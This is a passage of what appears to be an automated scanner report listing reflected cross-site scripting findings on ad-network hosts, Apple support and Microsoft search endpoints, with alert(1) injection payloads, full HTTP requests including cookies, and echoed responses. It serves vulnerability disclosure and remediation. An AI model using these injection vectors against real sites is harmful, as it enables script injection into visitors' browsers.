Content-Length: 1294

document.write('<iframe frameborder="0" width="728" height="90" marginheight="0" marginwidth="0" target="_blank" scrolling="no" src="http://ib.adnxs.com/if?enc=UrgehetR4D9SuB6F61HgPwAAAKCZmQVAmpmZmZmZ
...[SNIP]...
KQZ4AIA6gIXTVlCXzcyOHg5MF9HYW1lc19Ib21lXzKoAwHoAwjoAyfoA54H9QMAAIBM4AQBgAa4raSoqt7Y4JcB%26num%3D1%26sig%3DAOD64_0HV9CyXXRXmldNeY-MsDj6zKvo0g%26client%3Dca-pub-7306919723827765%26adurl%3D&tt_code=vert-85d8c9'-alert(1)-'aca8e4c3d50&udj=uf%28%27a%27%2C+16736%2C+1311271292%29%3Buf%28%27c%27%2C+98655%2C+1311271292%29%3Buf%28%27r%27%2C+474624%2C+1311271292%29%3Bppv%2814961%2C+%272437651056926727195%27%2C+1311271292%2C+1312480892%2C+
...[SNIP]...

3.68. http://ib.adnxs.com/ptj [redir parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e0961'%3balert(1)//77258745e1c was submitted in the redir parameter. This input was echoed as e0961';alert(1)//77258745e1c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=311&inv_code=cm.yearbook&size=300x250&imp_id=cm-10306552516_1311271251,11fda490648f83c&referrer=http%3A%2F%2Fgames.myyearbook.com%2F&redir=http%3A%2F%2Fad.doubleclick.net%2Fadj%2Fcm.yearbook%2Fford_ron_071911%3Bnet%3Dcm%3Bu%3D%2Ccm-10306552516_1311271251%2C11fda490648f83c%2Cgames%2Cax.{PRICEBUCKET}-bz.25%3B%3Bcmw%3Dowl%3Bsz%3D300x250%3Bnet%3Dcm%3Bord1%3D218732%3Bcontx%3Dgames%3Ban%3D{PRICEBUCKET}%3Bdc%3Dw%3Bbtg%3Dbz.25%3Bord%3D1520731557%3Fe0961'%3balert(1)//77258745e1c HTTP/1.1
Host: ib.adnxs.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/
Cookie: sess=1; uuid2=6516234360771219075; anj=Kfu=8fG5+^Cxrx)0s]#%2L_'x%SEV/hnK]18Ep.I>u3?!7G'6v$WPt[fR4#aoQ.`e#:wJBP@1>+^X$?SUr+(fV+'zvLnT#=)OqIw

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 22-Jul-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=6516234360771219075; path=/; expires=Wed, 19-Oct-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: icu=ChEIz34QChgCIAIoAjDz0qHxBBDz0qHxBBgB; path=/; expires=Wed, 19-Oct-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: acb477086=5_[r^208WM^9#a*>bPMv^E$G`?enc=AAAAAAAA8D_NzMzMzMzsPwAAAEAzMwNAzczMzMzM7D8AAAAAAADwPxSPy36XVUUdg472aqBQblpzaShOAAAAAAw8AwA3AQAA3QEAAAIAAABOfgYA510AAAEAAABVU0QAVVNEACwB-gAlDQAAoBABAgUCAQUAAAAAUB_tOAAAAAA.&tt_code=cm.yearbook&udj=uf%28%27a%27%2C+1267%2C+1311271283%29%3Buf%28%27c%27%2C+39654%2C+1311271283%29%3Buf%28%27r%27%2C+425550%2C+1311271283%29%3Bppv%281279%2C+%272109186109648637716%27%2C+1311271283%2C+1311876083%2C+39654%2C+24039%29%3Bppv%285150%2C+%272109186109648637716%27%2C+1311271283%2C+1311357683%2C+39654%2C+24039%29%3B&cnd=!whwh7gjmtQIQzvwZGAAg57sBMAE4pRpAAEjdA1CM-AxYAGBLaABwAHgAgAEAiAEAkAEBmAEBoAECqAEDsAEAuQEAAAAAAADwP8EBAAAAAAAA8D_JAZqZmZmZmfE_2QEAAAAAAADwP-ABAA..&ccd=!dAVtLQjmtQIQzvwZGOe7ASAA; path=/; expires=Fri, 22-Jul-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfu=8fG2<rcvjr/?0P(*AuB-u**g1:XIB_LEhzW%<rg(XV)`CZ8D]ccqzB-6O8z_!o8J2McQT/AO0qb`?Werk8MLb?d'RcKEk]=lqA^u!V!N%k=JTSWLp1V1MQf1/f-Nd>; path=/; expires=Wed, 19-Oct-2011 18:01:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Date: Thu, 21 Jul 2011 18:01:23 GMT
Content-Length: 413

document.write('<scr'+'ipt type="text/javascript"src="http://ad.doubleclick.net/adj/cm.yearbook/ford_ron_071911;net=cm;u=,cm-10306552516_1311271251,11fda490648f83c,games,ax.80-bz.25;;cmw=owl;sz=300x250;net=cm;ord1=218732;contx=games;an=80;dc=w;btg=bz.25;ord=1520731557?e0961';alert(1)//77258745e1c">
...[SNIP]...

3.69. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpck parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16024/128483/lifescript-470x250.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb81b'%3balert(1)//5d194e610e6 was submitted in the mpck parameter. This input was echoed as bb81b';alert(1)//5d194e610e6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16024/128483/lifescript-470x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16024-128483-16880-2%3Fmpt%3D80352151311276189929bb81b'%3balert(1)//5d194e610e6&mpt=80352151311276189929&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/q%3B243260174%3B0-0%3B0%3B31210306%3B6510-470/250%3B42925500/42943287/1%3B%3B%7Eokv%3D%3Bpath%3Dhealth/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D%21webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D1%3Btile%3D16%3B%7Esscs%3D%3f HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=16;sz=470x250;ord=101352252258050
Cookie: svid=396408271523; __utmz=183366586.1305458947.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.647930298.1305458947.1305458947.1305458947.1; mojo3=16024:16880

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:41 GMT
Server: Apache
Last-Modified: Thu, 30 Jun 2011 17:46:51 GMT
ETag: "4a9bc3-461e-4a6f17c6278c0"
Accept-Ranges: bytes
Content-Length: 18628
Content-Type: application/x-javascript

document.write( "<style>" );
document.write( ".selectOptional {display:none;}" );
document.write( ".headline_blockAD_____78296 {position:absolute;left:0px;top:10px;width:470px;height:30px;font-famil
...[SNIP]...
dhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=16;~sscs=?http://altfarm.mediaplex.com/ad/ck/16024-128483-16880-2?mpt=80352151311276189929bb81b';alert(1)//5d194e610e6?mpre=' + encodeURIComponent(url);
} else {
var redir = '';
if (RedirectURLAD_____78296 == '**' + 'redirecturl**') {
RedirectURLAD_____78296 = '';
}

try {
var ar = (docum
...[SNIP]...

3.70. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js [mpvc parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://img.mediaplex.com
Path:   /content/0/16024/128483/lifescript-470x250.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 408db'%3balert(1)//f589db99a52 was submitted in the mpvc parameter. This input was echoed as 408db';alert(1)//f589db99a52 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /content/0/16024/128483/lifescript-470x250.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F16024-128483-16880-2%3Fmpt%3D80352151311276189929&mpt=80352151311276189929&mpvc=http://ad.doubleclick.net/click%3Bh%3Dv8/3b4b/3/0/%2a/q%3B243260174%3B0-0%3B0%3B31210306%3B6510-470/250%3B42925500/42943287/1%3B%3B%7Eokv%3D%3Bpath%3Dhealth/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd%3Bcontentid%3D7f47b713%3Babr%3D%21webtvs%3Btax%3Dadhd%3Btax%3Dadhd_adult%3Btax%3Dadult_adhd%3Bcamp%3Dadhd%3Bcamp%3Dadhd_adult%3Bpos%3D1%3Btile%3D16%3B%7Esscs%3D%3f408db'%3balert(1)//f589db99a52 HTTP/1.1
Host: img.mediaplex.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/adcontrol.htm?adj/lfs2.lifescript/conditions;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=16;sz=470x250;ord=101352252258050
Cookie: svid=396408271523; __utmz=183366586.1305458947.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.647930298.1305458947.1305458947.1305458947.1; mojo3=16024:16880

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:23:59 GMT
Server: Apache
Last-Modified: Thu, 30 Jun 2011 17:46:51 GMT
ETag: "4a9bc3-461e-4a6f17c6278c0"
Accept-Ranges: bytes
Content-Length: 18656
Content-Type: application/x-javascript

document.write( "<style>" );
document.write( ".selectOptional {display:none;}" );
document.write( ".headline_blockAD_____78296 {position:absolute;left:0px;top:10px;width:470px;height:30px;font-famil
...[SNIP]...
2943287/1;;~okv=;path=health/conditions/add/how_to_quiet_the_symptoms_of_adult_adhd;contentid=7f47b713;abr=!webtvs;tax=adhd;tax=adhd_adult;tax=adult_adhd;camp=adhd;camp=adhd_adult;pos=1;tile=16;~sscs=?408db';alert(1)//f589db99a52' != ('<mp' + 'vc/>
...[SNIP]...

3.71. http://jlinks.industrybrains.com/jsct [ct parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The value of the ct request parameter is copied into the HTML document as plain text between tags. The payload 8b1a3<script>alert(1)</script>88ce88e2adb was submitted in the ct parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=918&ct=SCMAGAZINE_ROS8b1a3<script>alert(1)</script>88ce88e2adb&num=4&layt=624x300&fmt=simp HTTP/1.1
Host: jlinks.industrybrains.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Jul 2011 20:13:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 22 Jul 2011 20:13:23 GMT
Content-Type: application/x-javascript
Content-Length: 85

// Error: Unknown old section SCMAGAZINE_ROS8b1a3<script>alert(1)</script>88ce88e2adb

3.72. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jlinks.industrybrains.com
Path:   /jsct

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 8d8ec<script>alert(1)</script>5143365a5aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /jsct?sid=918&ct=SCMAGAZINE_ROS&num=4&layt=624x300&fmt=simp&8d8ec<script>alert(1)</script>5143365a5aa=1 HTTP/1.1
Host: jlinks.industrybrains.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.scmagazineus.com/

Response

HTTP/1.1 200 OK
Connection: close
Date: Fri, 22 Jul 2011 20:13:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Cache-Control: no-cache, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 22 Jul 2011 20:13:44 GMT
Content-Type: application/x-javascript
Content-Length: 69

// Error: Unknown parameter 8d8ec<script>alert(1)</script>5143365a5aa

3.73. http://js.revsci.net/gateway/gw.js [csid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The value of the csid request parameter is copied into the HTML document as plain text between tags. The payload 1cc9e<script>alert(1)</script>3aea9239800 was submitted in the csid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /gateway/gw.js?csid=G076081cc9e<script>alert(1)</script>3aea9239800 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Last-Modified: Sat, 23 Jul 2011 04:31:46 GMT
Cache-Control: max-age=86400, private
Expires: Sun, 24 Jul 2011 04:31:46 GMT
X-Proc-ms: 0
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Sat, 23 Jul 2011 04:31:45 GMT
Content-Length: 128

/*
* JavaScript include error:
* The customer code "G076081CC9E<SCRIPT>ALERT(1)</SCRIPT>3AEA9239800" was not recognized.
*/

3.74. http://km.support.apple.com/kb/index [doctype parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://km.support.apple.com
Path:   /kb/index

Issue detail

The value of the doctype request parameter is copied into the HTML document as plain text between tags. The payload dc073<img%20src%3da%20onerror%3dalert(1)>4cc5b1f4127 was submitted in the doctype parameter. This input was echoed as dc073<img src=a onerror=alert(1)>4cc5b1f4127 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /kb/index?page=products&locale=en_US&doctype=dc073<img%20src%3da%20onerror%3dalert(1)>4cc5b1f4127&callback=ACSearch.receiveGenericProducts HTTP/1.1
Host: km.support.apple.com
Proxy-Connection: keep-alive
Referer: http://support.apple.com/kb/index?page=search&src=support_site.home.search&locale=en_US&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7l PHP/5.2.4 DAV/1.0.3 mod_jk/1.2.28
Content-Length: 181
Content-Type: text/javascript;charset=UTF-8
Cache-Control: max-age=600
Expires: Thu, 21 Jul 2011 20:57:17 GMT
Date: Thu, 21 Jul 2011 20:47:17 GMT
Connection: close


ACSearch.receiveGenericProducts(
   
   { "name":"PRODUCTBROWSER.BROWSE_dc073<img src=a onerror=alert(1)>4cc5b1f4127", "id": "MAIN_PRODUCTS"
   

       ,
       "products" : [
]


   }
   );

3.75. http://lifescript.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://lifescript.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8cf9'-alert(1)-'244ace9388f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=18057&e8cf9'-alert(1)-'244ace9388f=1 HTTP/1.1
Host: lifescript.us.intellitxt.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR="AKdo0GgCJUYDq4t2/GN0I5MAADtIAAA7hAIAAAExTiYb6gA-"; Version=1; Domain=.intellitxt.com; Max-Age=5184000; Expires=Mon, 19-Sep-2011 19:22:25 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 11081
Date: Thu, 21 Jul 2011 19:22:25 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggin
...[SNIP]...
s.gaPageViewTracker='UA-15687529-23';$iTXT.js.verticalId='13';$iTXT.js.serverUrl='http://lifescript.us.intellitxt.com';$iTXT.js.serverName='lifescript.us.intellitxt.com';$iTXT.js.pageQuery='ipid=18057&e8cf9'-alert(1)-'244ace9388f=1';$iTXT.js.ipid='18057';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();(function(){var e=document.createElement("img");e.src="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=50000&c
...[SNIP]...

3.76. http://mm.chitika.net/minimall [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://mm.chitika.net
Path:   /minimall

Issue detail

The value of the callback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 32e36%3balert(1)//f54c5063e27 was submitted in the callback parameter. This input was echoed as 32e36;alert(1)//f54c5063e27 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /minimall?w=320&h=50&client=lifescript&sid=lifescript_mobile&cid=lifescript_mobile&type=mobile&screenres=1920x1200&winsize=1047x890&canvas=1023x140&frm=true&history=1&impsrc=amm&url=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&ref=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&cb=860&loc=12%2C140&output=simplejs&callback=ch_ad_render_search32e36%3balert(1)//f54c5063e27 HTTP/1.1
Host: mm.chitika.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:24:21 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 146
Connection: close
Content-Type: application/x-javascript; charset=utf-8

var ch_mmhtml = {"pixelhtml":"","reason":"not_mobile_device","alturl":"","output":"","cb":"860"};ch_ad_render_search32e36;alert(1)//f54c5063e27();

3.77. http://pixel.invitemedia.com/admeld_sync [admeld_callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /admeld_sync

Issue detail

The value of the admeld_callback request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f31a1'%3balert(1)//0c7fdb37037 was submitted in the admeld_callback parameter. This input was echoed as f31a1';alert(1)//0c7fdb37037 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /admeld_sync?admeld_user_id=d96a784e-8901-47de-9dd1-4f91acb31514&admeld_adprovider_id=300&admeld_call_type=js&admeld_callback=http://tag.admeld.com/matchf31a1'%3balert(1)//0c7fdb37037 HTTP/1.1
Host: pixel.invitemedia.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Sat, 23 Jul 2011 13:48:46 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Sat, 23-Jul-2011 13:48:26 GMT
Content-Type: text/javascript
Pragma: no-cache
Cache-Control: no-cache
Content-Length: 1070

document.write('<img width="0" height="0" src="http://tag.admeld.com/matchf31a1';alert(1)//0c7fdb37037?admeld_adprovider_id=300&external_user_id=09035c0c-59c0-487e-ac6a-85a606e2b1c1&Expiration=1311860926&custom_user_segments=%2C11265%2C50185%2C32345%2C48153%2C6171%2C48669%2C7713%2C48674%2C48675%2C26671
...[SNIP]...

3.78. http://services.social.microsoft.com/Search/Data/Terms [callback parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.social.microsoft.com
Path:   /Search/Data/Terms

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload bc091<script>alert(1)</script>21d034f6a3a was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Search/Data/Terms?callback=jsonp1311396321262bc091<script>alert(1)</script>21d034f6a3a&t=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1&a=1&s=9&m=10&mtl=4 HTTP/1.1
Host: services.social.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://msdn.microsoft.com/en-us/vstudio/ff431702.aspx
Cookie: WT_FPC=id=173.193.214.243-3409883184.30164746:lv=1311385526307:ss=1311385526307; MUID=1FDD375D440B439987A467BECD35D2C6; MSID=Microsoft.CreationDate=07/20/2011 18:28:20&Microsoft.LastVisitDate=07/22/2011 15:42:09&Microsoft.VisitStartDate=07/22/2011 15:42:09&Microsoft.CookieId=83f3d6dd-9e1a-4fc0-be7f-977f10276d9f&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=32&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0710-6455-2061-8144; MC1=GUID=7d82853ea5283f499a9e3add3769434b&HASH=3e85&LV=20117&V=3; A=I&I=AxUFAAAAAADHCAAAdQ+MX09BAsRu9umGsxl6kw!!&GO=244; omniID=1311187255305_231e_6145_d5f9_14f277e18b3d; WT_NVR_RU=0=technet|msdn:1=:2=; msdn=L=1033; mcI=Thu, 28 Jul 2011 23:10:45 GMT; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Cteonnt-Length: 140
Content-Type: application/x-javascript
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP=ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI
Server: CO1VB35
Date: Sat, 23 Jul 2011 04:46:18 GMT
Content-Length: 140

jsonp1311396321262bc091<script>alert(1)</script>21d034f6a3a({"Matches":[],"Term":"84e17<img%20src%3da%20onerror%3dalert(1)>8704c19d382=1"});

3.79. http://services.social.microsoft.com/Search/Data/Terms [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://services.social.microsoft.com
Path:   /Search/Data/Terms

Issue detail

The value of the t request parameter is copied into the HTML document as plain text between tags. The payload deba5<img%20src%3da%20onerror%3dalert(1)>680b3dd871d was submitted in the t parameter. This input was echoed as deba5<img src=a onerror=alert(1)>680b3dd871d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /Search/Data/Terms?callback=jsonp1311396321262&t=84e17%3Cimg%2520src%253da%2520onerror%253dalert(1)%3E8704c19d382%3D1deba5<img%20src%3da%20onerror%3dalert(1)>680b3dd871d&a=1&s=9&m=10&mtl=4 HTTP/1.1
Host: services.social.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
